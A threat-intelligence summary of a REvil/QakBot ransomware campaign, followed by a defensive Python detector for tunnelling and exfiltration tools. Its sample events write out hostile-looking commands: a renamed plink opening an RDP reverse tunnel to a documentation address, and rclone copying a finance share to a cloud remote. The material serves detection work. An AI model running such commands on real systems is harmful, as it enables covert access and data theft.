| Category | Details |
|---|---|
| Threat Actors | Sodinokibi (REvil), QakBot operators, Valak operators, ransomware affiliates |
| Campaign Overview | Ransomware actors specialize in phishing-based initial access (e.g., QakBot, Valak), followed by data exfiltration and ransomware deployment to extort victims. Collaboration among threat actors enhances their operations. |
| Target Regions (Victims) | Enterprises with valuable data (e.g., financial, IP, healthcare, HR, and backup data) across multiple industries. |
| Methodology | Phishing emails with malicious Office documents (Excel, Word); use of tools such as QakBot, Valak, Cobalt Strike, Rclone, and plink.exe for reconnaissance, lateral movement, and data exfiltration. |
| Product Targeted | Systems with Microsoft Office, Active Directory, and critical internal file shares. |
| Malware Reference | QakBot, Valak, Sodinokibi ransomware |
| Tools Used | Cobalt Strike, NetSupport Manager, Mimikatz, Rclone, MegaSync, MegaCmd, WinSCP, AdFind, nltest, plink.exe, ngrok.exe |
| Vulnerabilities Exploited | No specific software vulnerability; phishing and credential harvesting are used to bypass protections, and built-in system functionality (e.g., the SMB protocol, RDP tunneling) is abused rather than exploited. |
| TTPs | Double extortion, phishing campaigns, lateral movement (e.g., PowerShell payloads, the Service Control Manager (SCM), and admin shares), credential harvesting, RDP tunneling, and GPO misuse for ransomware deployment. |
| Attribution | Eastern European cybercrime origin; collaboration among ransomware groups such as Egregor, Clop, Ryuk, and DoppelPaymer. |
| Recommendations | Implement EDR, LAPS, SMB hardening, MFA, PAM, internal network segmentation, and vulnerability management, and restrict admin privileges. |
| Source | Security Intelligence |
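The tools and TTPs listed above (Rclone exfiltration, plink/ngrok tunneling, AD enumeration) are commonly hunted in process-creation telemetry. The following is an added detection example written for this summary, not code from the source article or any of the named projects; it assumes Sysmon Event ID 1 style fields (Image, OriginalFileName, CommandLine), assumes each tool's OriginalFileName equals its usual file name (verify against the real binaries), and uses constructed sample events.

```python
import re

# Tools named in the summary, keyed by the OriginalFileName from the PE version
# resource, so a copy renamed on disk still matches (Sysmon Event ID 1 logs it).
TOOL_SIGNATURES = {
    "rclone.exe": "rclone (bulk copy to cloud storage)",
    "plink.exe": "plink (SSH tunnelling, e.g. RDP over SSH)",
    "ngrok.exe": "ngrok (reverse tunnel to an external endpoint)",
    "adfind.exe": "AdFind (Active Directory reconnaissance)",
    "nltest.exe": "nltest (domain controller enumeration)",
}

# Per-tool command-line patterns that raise severity: plink's -R remote port
# forward, rclone transfers to a configured remote ("name:path"), ngrok tcp.
RISKY_ARGS = {
    "plink.exe": (re.compile(r"(^|\s)-R\s"), "remote port forward"),
    "rclone.exe": (re.compile(r"\b(copy|sync|move)\b.*\s[\w-]+:[^\s\\]", re.I),
                   "transfer to a cloud remote"),
    "ngrok.exe": (re.compile(r"\btcp\b", re.I), "TCP tunnel"),
}


def triage_event(event: dict) -> dict:
    """Classify one process-creation event as none / medium / high."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    findings, high = [], False
    for name, desc in TOOL_SIGNATURES.items():
        if name not in (image, original):
            continue
        findings.append(desc)
        if image != name:  # on-disk name differs from the PE's own name
            findings.append(f"renamed binary: {image} is really {name}")
            high = True
        if name in RISKY_ARGS and RISKY_ARGS[name][0].search(cmd):
            findings.append(RISKY_ARGS[name][1])
            high = True
    severity = "high" if high else ("medium" if findings else "none")
    return {"severity": severity, "findings": findings}


# Constructed sample events (not real telemetry); 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Temp\svchost.exe", "OriginalFileName": "plink.exe",
     "CommandLine": "svchost.exe -R 3389:127.0.0.1:3389 user@203.0.113.5"},
    {"Image": r"C:\Users\Public\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"rclone.exe copy \\fs01\finance mega:backup --transfers 8"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe report.txt"},
]
```

Matching on OriginalFileName as well as the on-disk name is what catches the renamed-plink case; pair this with EDR blocking of the same binaries and egress filtering for the cloud remotes.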
Disclaimer: The above summary has been generated by an AI language model.